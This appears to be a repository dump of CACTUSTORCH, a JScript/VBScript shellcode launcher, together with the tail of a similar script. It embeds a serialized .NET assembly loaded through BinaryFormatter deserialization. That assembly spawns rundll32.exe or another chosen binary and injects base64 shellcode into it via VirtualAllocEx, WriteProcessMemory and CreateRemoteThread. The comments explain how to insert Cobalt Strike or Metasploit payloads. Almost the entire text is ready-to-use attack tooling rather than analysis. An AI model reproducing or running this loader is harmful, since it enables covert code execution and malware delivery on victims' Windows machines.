"bWwsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdh"+ 80 | "NWM1NjE5MzRlMDg5BhQAAAAHdGFyZ2V0MAkGAAAABhYAAAAaU3lzdGVtLlJlZmxlY3Rpb24uQXNz"+ 81 | "ZW1ibHkGFwAAAARMb2FkCg8MAAAAAB4AAAJNWpAAAwAAAAQAAAD//wAAuAAAAAAAAABAAAAAAAAA"+ 82 | "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAAAAADh+6DgC0Cc0huAFMzSFUaGlzIHByb2dy"+ 83 | "YW0gY2Fubm90IGJlIHJ1biBpbiBET1MgbW9kZS4NDQokAAAAAAAAAFBFAABMAQMAWIaiWgAAAAAA"+ 84 | "AAAA4AAiIAsBMAAAFgAAAAYAAAAAAADuNQAAACAAAABAAAAAAAAQACAAAAACAAAEAAAAAAAAAAQA"+ 85 | "AAAAAAAAAIAAAAACAAAAAAAAAwBAhQAAEAAAEAAAAAAQAAAQAAAAAAAAEAAAAAAAAAAAAAAAnDUA"+ 86 | "AE8AAAAAQAAAkAMAAAAAAAAAAAAAAAAAAAAAAAAAYAAADAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+ 87 | "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAIAAAAAAAAAAAAAAAIIAAASAAAAAAAAAAA"+ 88 | "AAAALnRleHQAAAD0FQAAACAAAAAWAAAAAgAAAAAAAAAAAAAAAAAAIAAAYC5yc3JjAAAAkAMAAABA"+ 89 | "AAAABAAAABgAAAAAAAAAAAAAAAAAAEAAAEAucmVsb2MAAAwAAAAAYAAAAAIAAAAcAAAAAAAAAAAA"+ 90 | "AAAAAABAAABCAAAAAAAAAAAAAAAAAAAAANA1AAAAAAAASAAAAAIABQAMIgAAkBMAAAEAAAAAAAAA"+ 91 | "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgIoDwAACioT"+ 92 | "MAoAHAEAAAEAABEEKBAAAAoKEgEGjmkoEQAACnMKAAAGDAgWfTUAAARyAQAAcBMEcgMAAHAoEgAA"+ 93 | "Cm8TAAAKFjEZch0AAHAoEgAACnIrAABwAygUAAAKEwQrF3IdAABwKBIAAApyQQAAcAMoFAAAChME"+ 94 | "EQQUFBQXGn4VAAAKFAgSAygBAAAGJgl7BAAABBMFEgUoFgAACnJXAABwKBcAAAo5gAAAABEFFnMR"+ 95 | "AAAKByAAMAAAGigCAAAGEwYSBigWAAAKclcAAHAoGAAACiwKEQUWKAUAAAYmKhYTBxIIBo5pKBEA"+ 96 | "AAoRBREGBhEIEQcoBAAABiYRBREGBx8gFnMRAAAKKAMAAAYmEQUWcxEAAAoWEQYWcxEAAAoWFnMR"+ 97 | "AAAKKAYAAAYmKnoCfhUAAAp9AgAABAIoDwAACgICKBkAAAp9AQAABCoAEzACAGAAAAAAAAAAAn4V"+ 98 | "AAAKfSsAAAQCfhUAAAp9LAAABAJ+FQAACn0tAAAEAn4VAAAKfTgAAAQCfhUAAAp9OQAABAJ+FQAA"+ 99 | "Cn06AAAEAn4VAAAKfTsAAAQCKA8AAAoCAigZAAAKfSoAAAQqQlNKQgEAAQAAAAAADAAAAHYyLjAu"+ 100 | "NTA3MjcAAAAABQBsAAAAXAcAACN+AADIBwAAdAkAACNTdHJpbmdzAAAAADwRAABcAAAAI1VTAJgR"+ 101 | "AAAQAAAAI0dVSUQAAACoEQAA6AEAACNCbG9iAAAAAAAAAAIAAAFXHQIUCQIAAAD6ATMAFgAAAQAA"+ 102 | "ABcAAAAJAAAAUAAAAAoAAAAkAAAAGQAAADMAAAASAAAAAQAAAAEAAAAGAAAAAQAAAAEAAAAHAAAA"+ 103 | "AACZBgEAAAAAAAYAXAWSBwYAyQWSBwYAigRgBw8AsgcAAAYAsgThBgYAMAXhBgYAEQXhBgYAsAXh"+ 104 | "BgYAfAXhBgYAlQXhBgYAyQThBgYAngRzBwYAfARzBwYA9AThBgYAqwipBgYAYQSpBgYATQWpBgYA"+ 105 | "sAapBgYA5AipBgYAWQepBgYA2AipBgYAZgapBgYAhAZzBwAAAAAlAAAAAAABAAEAAQAQAG0GAAA9"+ 106 | "AAEAAQAKABAA+AcAAD0AAQAJAAoBEADOBgAAQQAEAAoAAgEAABsIAABJAAgACgACAQAANggAAEkA"+ 107 | "JwAKAAoAEAAGBwAAPQAqAAoAAgEAAG0EAABJADwACwACAQAA8wYAAEkARQALAAYAfQb6AAYARAc/"+ 108 | "AAYAJAT9AAYAdAg/AAYA5wM/AAYAyAP6AAYAvQP6AAYGngMAAVaAsgIDAVaAwAIDAVaAZAADAVaA"+ 109 | "iAIDAVaAwgADAVaAUwIDAVaA8QEDAVaAHQIDAVaABQIDAVaAoAEDAVaAAgMDAVaAXgEDAVaASAED"+ 110 | "AVaA4QEDAVaATQIDAVaAMQIDAVaAagMDAVaAggMDAVaAmQIDAVaAHQMDAVaAdgEDAVaAdQADAVaA"+ 111 | "PQADAVaAJwEDAVaAqAADAVaAOgMDAVaAuQEDAVaAGAEDAVaAxgEDAVaA5QIDAQYGngMAAVaAkQAH"+ 112 | "AVaAcgIHAQYApgP6AAYA7wM/AAYAFwc/AAYAMwQ/AAYASwP6AAYAmgP6AAYA5wX6AAYA7wX6AAYA"+ 113 | "Rwj6AAYAVQj6AAYA5AT6AAYALgj6AAYAAQkLAQYADQALAQYAGQA/AAYA7Ag/AAYA9gg/AAYANAc/"+ 114 | "AAYGngMAAVaA3gIOAVaA7wAOAVaAnQEOAVaA2AIOAVaA1QEOAVaADwEOAVaAlAEOAVaAAwEOAQYG"+ 115 | "ngMAAVaA5wASAVaAVwASAVaA1QASAVaAWAMSAVaAaQISAVaATwMSAVaA3QASAVaAYAMSAVaAEQYS"+ 116 | "AVaAJAYSAVaAOQYSAQAAAACAAJYgLgAWAQEAAAAAAIAAliANCSoBCwAAAAAAgACWIBwJNQEQAAAA"+ 117 | "AACAAJYgNAk/ARUAAAAAAIAAliBjCEkBGgAAAAAAgACRINQDTwEcAFAgAAAAAIYYPgcGACMAWCAA"+ 118 | "AAAAhgBNBFoBIwCAIQAAAACGGD4HBgAlAKAhAAAAAIYYPgcGACUAAAABADsEAAACAFMEAAADAOQH"+ 119 | "AAAEANEHAAAFAMEHAAAGAAsIAAAHANYIAAAIAEcJAQAJAAQHAgAKAMwGAAABABsEAAACAIsIAAAD"+ 120 | "AAMGAAAEAGsEAAAFAL8IAAABABsEAAACAIsIAAADAAMGAAAEAMkIAAAFALIIAAABAHQIAAACAH0I"+ 121 | "AAADACEHAAAEAAMGAAAFALUGAAABAHQIAAACAPoDAAABAHQIAAACANEHAAADAPcFAAAEAJUIAAAF"+ 122 | "ACgHAAAGAAsIAAAHALIDAAABAC0JAAACAAEACQA+BwEAEQA+BwYAGQA+BwoAKQA+BxAAMQA+BxAA"+ 123 | "OQA+BxAAQQA+BxAASQA+BxAAUQA+BxAAWQA+BxAAYQA+BxUAaQA+BxAAcQA+BxAAiQA+BwYAeQA+"+ 124 | "BwYAmQBTBikAoQA+BwEAqQAEBC8AsQB5BjQAsQCkCDgAoQASBz8AoQBkBkIAsQBmCUYAsQBaCUYA"+ 125 | "uQAKBkwACQAkAFoACQAoAF8ACQAsAGQACQAwAGkACQA0AG4ACQA4AHMACQA8AHgACQBAAH0ACQBE"+ 126 | "AIIACQBIAIcACQBMAIwACQBQAJEACQBUAJYACQBYAJsACQBcAKAACQBgAKUACQBkAKoACQBoAK8A"+ 127 | "CQBsALQACQBwALkACQB0AL4ACQB4AMMACQB8AMgACQCAAM0ACQCEANIACQCIANcACQCMANwACQCQ"+ 128 | "AOEACQCUAOYACQCYAOsACQCgAFoACQCkAF8ACQD0AJYACQD4AJsACQD8APAACQAAAbkACQAEAeEA"+ 129 | "CQAIAfUACQAMAb4ACQAQAcMACQAYAW4ACQAcAXMACQAgAXgACQAkAX0ACQAoAVoACQAsAV8ACQAw"+ 130 | "AWQACQA0AWkACQA4AYIACQA8AYcACQBAAYwALgALAGABLgATAGkBLgAbAIgBLgAjAJEBLgArAJEB"+ 131 | "LgAzAKIBLgA7AKIBLgBDAJEBLgBLAJEBLgBTAKIBLgBbAKgBLgBjAK4BLgBrANgBQwBbAKgBowBz"+ 132 | "AFoAwwBzAFoAAwFzAFoAIwFzAFoAGgCMBgABAwAuAAEAAAEFAA0JAQAAAQcAHAkBAAABCQA0CQEA"+ 133 | "AAELAGMIAQAAAQ0A1AMBAASAAAABAAAAAAAAAAAAAAAAAPcAAAACAAAAAAAAAAAAAABRAKkDAAAA"+ 134 | "AAMAAgAEAAIABQACAAYAAgAHAAIACAACAAkAAgAAAAAAAHNoZWxsY29kZTMyAGNiUmVzZXJ2ZWQy"+ 135 | "AGxwUmVzZXJ2ZWQyADxNb2R1bGU+AENyZWF0ZVByb2Nlc3NBAENSRUFURV9CUkVBS0FXQVlfRlJP"+ 136 | "TV9KT0IARVhFQ1VURV9SRUFEAENSRUFURV9TVVNQRU5ERUQAUFJPQ0VTU19NT0RFX0JBQ0tHUk9V"+ 137 | "TkRfRU5EAERVUExJQ0FURV9DTE9TRV9TT1VSQ0UAQ1JFQVRFX0RFRkFVTFRfRVJST1JfTU9ERQBD"+ 138 | "UkVBVEVfTkVXX0NPTlNPTEUARVhFQ1VURV9SRUFEV1JJVEUARVhFQ1VURQBSRVNFUlZFAENBQ1RV"+ 139 | "U1RPUkNIAFdSSVRFX1dBVENIAFBIWVNJQ0FMAFBST0ZJTEVfS0VSTkVMAENSRUFURV9QUkVTRVJW"+ 140 | "RV9DT0RFX0FVVEhaX0xFVkVMAENSRUFURV9TSEFSRURfV09XX1ZETQBDUkVBVEVfU0VQQVJBVEVf"+ 141 | "V09XX1ZETQBQUk9DRVNTX01PREVfQkFDS0dST1VORF9CRUdJTgBUT1BfRE9XTgBHTwBDUkVBVEVf"+ 142 | "TkVXX1BST0NFU1NfR1JPVVAAUFJPRklMRV9VU0VSAFBST0ZJTEVfU0VSVkVSAExBUkdFX1BBR0VT"+ 143 | "AENSRUFURV9GT1JDRURPUwBJRExFX1BSSU9SSVRZX0NMQVNTAFJFQUxUSU1FX1BSSU9SSVRZX0NM"+ 144 | "QVNTAEhJR0hfUFJJT1JJVFlfQ0xBU1MAQUJPVkVfTk9STUFMX1BSSU9SSVRZX0NMQVNTAEJFTE9X"+ 145 | "X05PUk1BTF9QUklPUklUWV9DTEFTUwBOT0FDQ0VTUwBEVVBMSUNBVEVfU0FNRV9BQ0NFU1MAREVU"+ 146 | "QUNIRURfUFJPQ0VTUwBDUkVBVEVfUFJPVEVDVEVEX1BST0NFU1MAREVCVUdfUFJPQ0VTUwBERUJV"+ 147 | "R19PTkxZX1RISVNfUFJPQ0VTUwBSRVNFVABDT01NSVQAQ1JFQVRFX0lHTk9SRV9TWVNURU1fREVG"+ 148 | "QVVMVABDUkVBVEVfVU5JQ09ERV9FTlZJUk9OTUVOVABFWFRFTkRFRF9TVEFSVFVQSU5GT19QUkVT"+ 149 | "RU5UAENSRUFURV9OT19XSU5ET1cAZHdYAFJFQURPTkxZAEVYRUNVVEVfV1JJVEVDT1BZAElOSEVS"+ 150 | "SVRfUEFSRU5UX0FGRklOSVRZAElOSEVSSVRfQ0FMTEVSX1BSSU9SSVRZAGR3WQB2YWx1ZV9fAGNi"+ 151 | "AG1zY29ybGliAGxwVGhyZWFkSWQAZHdUaHJlYWRJZABkd1Byb2Nlc3NJZABDcmVhdGVSZW1vdGVU"+ 152 | "aHJlYWQAaFRocmVhZABscFJlc2VydmVkAHVFeGl0Q29kZQBHZXRFbnZpcm9ubWVudFZhcmlhYmxl"+ 153 | "AGxwSGFuZGxlAGJJbmhlcml0SGFuZGxlAGxwVGl0bGUAbHBBcHBsaWNhdGlvbk5hbWUAZmxhbWUA"+ 154 | "bHBDb21tYW5kTGluZQBWYWx1ZVR5cGUAZmxBbGxvY2F0aW9uVHlwZQBHdWlkQXR0cmlidXRlAERl"+ 155 | "YnVnZ2FibGVBdHRyaWJ1dGUAQ29tVmlzaWJsZUF0dHJpYnV0ZQBBc3NlbWJseVRpdGxlQXR0cmli"+ 156 | "dXRlAEFzc2VtYmx5VHJhZGVtYXJrQXR0cmlidXRlAGR3RmlsbEF0dHJpYnV0ZQBBc3NlbWJseUZp"+ 157 | "bGVWZXJzaW9uQXR0cmlidXRlAEFzc2VtYmx5Q29uZmlndXJhdGlvbkF0dHJpYnV0ZQBBc3NlbWJs"+ 158 | "eURlc2NyaXB0aW9uQXR0cmlidXRlAEZsYWdzQXR0cmlidXRlAENvbXBpbGF0aW9uUmVsYXhhdGlv"+ 159 | "bnNBdHRyaWJ1dGUAQXNzZW1ibHlQcm9kdWN0QXR0cmlidXRlAEFzc2VtYmx5Q29weXJpZ2h0QXR0"+ 160 | "cmlidXRlAEFzc2VtYmx5Q29tcGFueUF0dHJpYnV0ZQBSdW50aW1lQ29tcGF0aWJpbGl0eUF0dHJp"+ 161 | "YnV0ZQBkd1hTaXplAGR3WVNpemUAZHdTdGFja1NpemUAZHdTaXplAFNpemVPZgBHVUFSRF9Nb2Rp"+ 162 | "ZmllcmZsYWcATk9DQUNIRV9Nb2RpZmllcmZsYWcAV1JJVEVDT01CSU5FX01vZGlmaWVyZmxhZwBG"+ 163 | "cm9tQmFzZTY0U3RyaW5nAFRvU3RyaW5nAGNhY3R1c1RvcmNoAGdldF9MZW5ndGgATWFyc2hhbABr"+ 164 | "ZXJuZWwzMi5kbGwAQ0FDVFVTVE9SQ0guZGxsAFN5c3RlbQBFbnVtAGxwTnVtYmVyT2ZCeXRlc1dy"+ 165 | "aXR0ZW4AbHBQcm9jZXNzSW5mb3JtYXRpb24AU3lzdGVtLlJlZmxlY3Rpb24ATWVtb3J5UHJvdGVj"+ 166 | "dGlvbgBscFN0YXJ0dXBJbmZvAFplcm8AbHBEZXNrdG9wAGJ1ZmZlcgBscFBhcmFtZXRlcgBoU3Rk"+ 167 | "RXJyb3IALmN0b3IAbHBTZWN1cml0eURlc2NyaXB0b3IASW50UHRyAFN5c3RlbS5EaWFnbm9zdGlj"+ 168 | "cwBTeXN0ZW0uUnVudGltZS5JbnRlcm9wU2VydmljZXMAU3lzdGVtLlJ1bnRpbWUuQ29tcGlsZXJT"+ 169 | "ZXJ2aWNlcwBEZWJ1Z2dpbmdNb2RlcwBiSW5oZXJpdEhhbmRsZXMAbHBUaHJlYWRBdHRyaWJ1dGVz"+ 170 | "AGxwUHJvY2Vzc0F0dHJpYnV0ZXMAU2VjdXJpdHlBdHRyaWJ1dGVzAGR3Q3JlYXRpb25GbGFncwBD"+ 171 | "cmVhdGVQcm9jZXNzRmxhZ3MAZHdGbGFncwBEdXBsaWNhdGVPcHRpb25zAGR3WENvdW50Q2hhcnMA"+ 172 | "ZHdZQ291bnRDaGFycwBUZXJtaW5hdGVQcm9jZXNzAGhQcm9jZXNzAGxwQmFzZUFkZHJlc3MAbHBB"+ 173 | "ZGRyZXNzAGxwU3RhcnRBZGRyZXNzAENvbmNhdABPYmplY3QAZmxPbGRQcm90ZWN0AGZsUHJvdGVj"+ 174 | "dABmbE5ld1Byb3RlY3QAbHBFbnZpcm9ubWVudABDb252ZXJ0AGhTdGRJbnB1dABoU3RkT3V0cHV0"+ 175 | "AHdTaG93V2luZG93AFZpcnR1YWxBbGxvY0V4AFZpcnR1YWxQcm90ZWN0RXgAYmluYXJ5AFdyaXRl"+ 176 | "UHJvY2Vzc01lbW9yeQBscEN1cnJlbnREaXJlY3RvcnkAb3BfRXF1YWxpdHkAb3BfSW5lcXVhbGl0"+ 177 | "eQAAAQAZUAByAG8AZwByAGEAbQBXADYANAAzADIAAA13AGkAbgBkAGkAcgAAFVwAUwB5AHMAVwBP"+ 178 | "AFcANgA0AFwAABVcAFMAeQBzAHQAZQBtADMAMgBcAAADMAAAABZi8URz/RpBkHALmYfP+r4ABCAB"+ 179 | "AQgDIAABBSABARERBCABAQ4EIAEBAg4HCR0FGBIcERAOGBgIGAUAAR0FDgQAAQ4OAyAACAYAAw4O"+ 180 | "Dg4CBhgDIAAOBQACAg4OBAABCBwIt3pcVhk04IkEAQAAAAQCAAAABAQAAAAECAAAAAQQAAAABCAA"+ 181 | "AAAEQAAAAASAAAAABAABAAAEAAIAAAQABAAABAAIAAAEABAAAAQAIAAABABAAAAEAIAAAAQAAAEA"+ 182 | "BAAAAgAEAAAEAAQAAAgABAAAEAAEAAAgAAQAAAABBAAAAAIEAAAABAQAAAAIBAAAABAEAAAAIAQA"+ 183 | "AABABAAAAIAEADAAAAQAAEAAAgYIAgYCAgYJAwYRFAMGERgCBgYDBhEgAwYRJBMAChgODhIMEgwC"+ 184 | "ERQYDhIcEBEQCgAFGBgYGBEgESQJAAUYGBgYESQYCQAFAhgYHQUYCAUAAgIYCQoABxgYGAkYGAkY"+ 185 | "BSACAQ4OCAEACAAAAAAAHgEAAQBUAhZXcmFwTm9uRXhjZXB0aW9uVGhyb3dzAQgBAAIAAAAAABAB"+ 186 | "AAtDQUNUVVNUT1JDSAAABQEAAAAABQEAAQAAKQEAJDU2NTk4ZjFjLTZkODgtNDk5NC1hMzkyLWFm"+ 187 | "MzM3YWJlNTc3NwAADAEABzEuMC4wLjAAAAAAAMQ1AAAAAAAAAAAAAN41AAAAIAAAAAAAAAAAAAAA"+ 188 | "AAAAAAAAAAAAAADQNQAAAAAAAAAAAAAAAF9Db3JEbGxNYWluAG1zY29yZWUuZGxsAAAAAAD/JQAg"+ 189 | "ABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAEAAAABgAAIAAAAAAAAAAAAAAAAAAAAEAAQAA"+ 190 | "ADAAAIAAAAAAAAAAAAAAAAAAAAEAAAAAAEgAAABYQAAANAMAAAAAAAAAAAAANAM0AAAAVgBTAF8A"+ 191 | "VgBFAFIAUwBJAE8ATgBfAEkATgBGAE8AAAAAAL0E7/4AAAEAAAABAAAAAAAAAAEAAAAAAD8AAAAA"+ 192 | "AAAABAAAAAIAAAAAAAAAAAAAAAAAAABEAAAAAQBWAGEAcgBGAGkAbABlAEkAbgBmAG8AAAAAACQA"+ 193 | "BAAAAFQAcgBhAG4AcwBsAGEAdABpAG8AbgAAAAAAAACwBJQCAAABAFMAdAByAGkAbgBnAEYAaQBs"+ 194 | "AGUASQBuAGYAbwAAAHACAAABADAAMAAwADAAMAA0AGIAMAAAADAADAABAEMAbwBtAG0AZQBuAHQA"+ 195 | "cwAAAEMAQQBDAFQAVQBTAFQATwBSAEMASAAAACIAAQABAEMAbwBtAHAAYQBuAHkATgBhAG0AZQAA"+ 196 | "AAAAAAAAAEAADAABAEYAaQBsAGUARABlAHMAYwByAGkAcAB0AGkAbwBuAAAAAABDAEEAQwBUAFUA"+ 197 | "UwBUAE8AUgBDAEgAAAAwAAgAAQBGAGkAbABlAFYAZQByAHMAaQBvAG4AAAAAADEALgAwAC4AMAAu"+ 198 | "ADAAAABAABAAAQBJAG4AdABlAHIAbgBhAGwATgBhAG0AZQAAAEMAQQBDAFQAVQBTAFQATwBSAEMA"+ 199 | "SAAuAGQAbABsAAAAPAAMAAEATABlAGcAYQBsAEMAbwBwAHkAcgBpAGcAaAB0AAAAQwBBAEMAVABV"+ 200 | "AFMAVABPAFIAQwBIAAAAKgABAAEATABlAGcAYQBsAFQAcgBhAGQAZQBtAGEAcgBrAHMAAAAAAAAA"+ 201 | "AABIABAAAQBPAHIAaQBnAGkAbgBhAGwARgBpAGwAZQBuAGEAbQBlAAAAQwBBAEMAVABVAFMAVABP"+ 202 | "AFIAQwBIAC4AZABsAGwAAAA4AAwAAQBQAHIAbwBkAHUAYwB0AE4AYQBtAGUAAAAAAEMAQQBDAFQA"+ 203 | "VQBTAFQATwBSAEMASAAAADQACAABAFAAcgBvAGQAdQBjAHQAVgBlAHIAcwBpAG8AbgAAADEALgAw"+ 204 | "AC4AMAAuADAAAAA4AAgAAQBBAHMAcwBlAG0AYgBsAHkAIABWAGUAcgBzAGkAbwBuAAAAMQAuADAA"+ 205 | "LgAwAC4AMAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+ 206 | "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+ 207 | "AAAAAAAAAAAAAAAAADAAAAwAAADwNQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+ 208 | "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+ 209 | "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+ 210 | "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+ 211 | "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+ 212 | "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+ 213 | "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+ 214 | "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+ 215 | "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+ 216 | "AAAAAAAAAAAAAAABDQAAAAQAAAAJFwAAAAkGAAAACRYAAAAGGgAAACdTeXN0ZW0uUmVmbGVjdGlv"+ 217 | "bi5Bc3NlbWJseSBMb2FkKEJ5dGVbXSkIAAAACgsA"; 218 | var entry_class = 'cactusTorch'; 219 | 220 | try { 221 | setversion(); 222 | var stm = base64ToStream(serialized_obj); 223 | var fmt = new ActiveXObject('System.Runtime.Serialization.Formatters.Binary.BinaryFormatter'); 224 | var al = new ActiveXObject('System.Collections.ArrayList'); 225 | var n = fmt.SurrogateSelector; 226 | var d = fmt.Deserialize_2(stm); 227 | al.Add(n); 228 | var o = d.DynamicInvoke(al.ToArray()).CreateInstance(entry_class); 229 | o.flame(binary,code); 230 | } catch (e) { 231 | debug(e.message); 232 | } -------------------------------------------------------------------------------- /CACTUSTORCH.jse: -------------------------------------------------------------------------------- 1 | /* 2 | ( ) ( ) 3 | ( ( ( * ) )\ ) * ) ( /( )\ ) ( ( /( 4 | )\ )\ )\ ` ) /( ( (()/(` ) /( )\())(()/( )\ )\()) 5 | (((_|(((_)( (((_) ( )(_)) )\ /(_))( )(_)|(_)\ /(_)|((_)((_)\ 6 | )\___)\ _ )\ )\___(_(_())_ ((_|_)) (_(_()) ((_)(_)) )\___ _((_) 7 | ((/ __(_)_\(_|(/ __|_ _| | | / __||_ _| / _ \| _ ((/ __| || | 8 | | (__ / _ \ | (__ | | | |_| \__ \ | | | (_) | /| (__| __ | 9 | \___/_/ \_\ \___| |_| \___/|___/ |_| \___/|_|_\ \___|_||_| 10 | 11 | Author: Vincent Yiu (@vysecurity) 12 | Credits: 13 | - @cn33liz: Inspiration with StarFighter 14 | - @ttiraniddo: James Forshaw for DotNet2JScript 15 | - @armitagehacker: Raphael Mudge for idea of selecting 32 bit version on 64 bit architecture machines for injection into 16 | 17 | A JavaScript and VBScript shellcode launcher. This will spawn a 32 bit version of the binary specified and inject shellcode into it. 18 | 19 | Usage: 20 | Choose a binary you want to inject into, default "rundll32.exe", you can use notepad.exe, calc.exe for example... 21 | Generate a 32 bit raw shellcode in whatever framework you want. Tested: Cobalt Strike, Metasploit Framework 22 | Run: cat payload.bin | base64 -w 0 23 | Copy the base64 encoded payload into the code variable below. 24 | 25 | */ 26 | 27 | // Replace binary with a executable in both SYSTEM32 and SYSWOW64 that you want to use as container. eg. notepad.exe, calc.exe 28 | var binary = "rundll32.exe"; 29 | 30 | // Replace code with base64 encoded 32 bit shellcode 31 | var code = "TVroAAAAAFtSRVWJ5YHDcoAAAP/TicNXaAQAAABQ/9Bo8LWiVmgFAAAAUP/TAAAAAAAAAAAAAAAAAAAA8AAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAACf0hwW27NyRduzckXbs3JFZvzkRdqzckXF4fZF8rNyRcXh50XIs3JFxeHxRVqzckX8dQlF1LNyRduzc0UGs3JFxeH7RWKzckXF4eBF2rNyRcXh40Xas3JFUmljaNuzckUAAAAAAAAAAAAAAAAAAAAAUEUAAEwBBQBOViNZAAAAAAAAAADgAAKhCwEJAABCAgAA4gAAAAAAAFFvAQAAEAAAAGACAAAAABAAEAAAAAIAAAUAAAAAAAAABQAAAAA"; 32 | 33 | 34 | // ------------ DO NOT EDIT BELOW HERE -------------- 35 | 36 | function setversion() { 37 | var shell = new ActiveXObject('WScript.Shell'); 38 | ver = 'v4.0.30319'; 39 | try { 40 | shell.RegRead('HKLM\\SOFTWARE\\Microsoft\\.NETFramework\\v4.0.30319\\'); 41 | } catch(e) { 42 | ver = 'v2.0.50727'; 43 | } 44 | shell.Environment('Process')('COMPLUS_Version') = ver; 45 | 46 | } 47 | function debug(s) {} 48 | function base64ToStream(b) { 49 | var enc = new ActiveXObject("System.Text.ASCIIEncoding"); 50 | var length = enc.GetByteCount_2(b); 51 | var ba = enc.GetBytes_4(b); 52 | var transform = new ActiveXObject("System.Security.Cryptography.FromBase64Transform"); 53 | ba = transform.TransformFinalBlock(ba, 0, length); 54 | var ms = new ActiveXObject("System.IO.MemoryStream"); 55 | ms.Write(ba, 0, (length / 4) * 3); 56 | ms.Position = 0; 57 | return ms; 58 | } 59 | 60 | var serialized_obj = "AAEAAAD/////AQAAAAAAAAAEAQAAACJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVy"+ 61 | "AwAAAAhEZWxlZ2F0ZQd0YXJnZXQwB21ldGhvZDADAwMwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXph"+ 62 | "dGlvbkhvbGRlcitEZWxlZ2F0ZUVudHJ5IlN5c3RlbS5EZWxlZ2F0ZVNlcmlhbGl6YXRpb25Ib2xk"+ 63 | "ZXIvU3lzdGVtLlJlZmxlY3Rpb24uTWVtYmVySW5mb1NlcmlhbGl6YXRpb25Ib2xkZXIJAgAAAAkD"+ 64 | "AAAACQQAAAAEAgAAADBTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyK0RlbGVnYXRl"+ 65 | "RW50cnkHAAAABHR5cGUIYXNzZW1ibHkGdGFyZ2V0EnRhcmdldFR5cGVBc3NlbWJseQ50YXJnZXRU"+ 66 | "eXBlTmFtZQptZXRob2ROYW1lDWRlbGVnYXRlRW50cnkBAQIBAQEDMFN5c3RlbS5EZWxlZ2F0ZVNl"+ 67 | "cmlhbGl6YXRpb25Ib2xkZXIrRGVsZWdhdGVFbnRyeQYFAAAAL1N5c3RlbS5SdW50aW1lLlJlbW90"+ 68 | "aW5nLk1lc3NhZ2luZy5IZWFkZXJIYW5kbGVyBgYAAABLbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAu"+ 69 | "MCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5BgcAAAAH"+ 70 | "dGFyZ2V0MAkGAAAABgkAAAAPU3lzdGVtLkRlbGVnYXRlBgoAAAANRHluYW1pY0ludm9rZQoEAwAA"+ 71 | "ACJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyAwAAAAhEZWxlZ2F0ZQd0YXJnZXQw"+ 72 | "B21ldGhvZDADBwMwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXphdGlvbkhvbGRlcitEZWxlZ2F0ZUVu"+ 73 | "dHJ5Ai9TeXN0ZW0uUmVmbGVjdGlvbi5NZW1iZXJJbmZvU2VyaWFsaXphdGlvbkhvbGRlcgkLAAAA"+ 74 | "CQwAAAAJDQAAAAQEAAAAL1N5c3RlbS5SZWZsZWN0aW9uLk1lbWJlckluZm9TZXJpYWxpemF0aW9u"+ 75 | "SG9sZGVyBgAAAAROYW1lDEFzc2VtYmx5TmFtZQlDbGFzc05hbWUJU2lnbmF0dXJlCk1lbWJlclR5"+ 76 | "cGUQR2VuZXJpY0FyZ3VtZW50cwEBAQEAAwgNU3lzdGVtLlR5cGVbXQkKAAAACQYAAAAJCQAAAAYR"+ 77 | "AAAALFN5c3RlbS5PYmplY3QgRHluYW1pY0ludm9rZShTeXN0ZW0uT2JqZWN0W10pCAAAAAoBCwAA"+ 78 | "AAIAAAAGEgAAACBTeXN0ZW0uWG1sLlNjaGVtYS5YbWxWYWx1ZUdldHRlcgYTAAAATVN5c3RlbS5Y"+ 79 | "bWwsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdh"+ 80 | "NWM1NjE5MzRlMDg5BhQAAAAHdGFyZ2V0MAkGAAAABhYAAAAaU3lzdGVtLlJlZmxlY3Rpb24uQXNz"+ 81 | 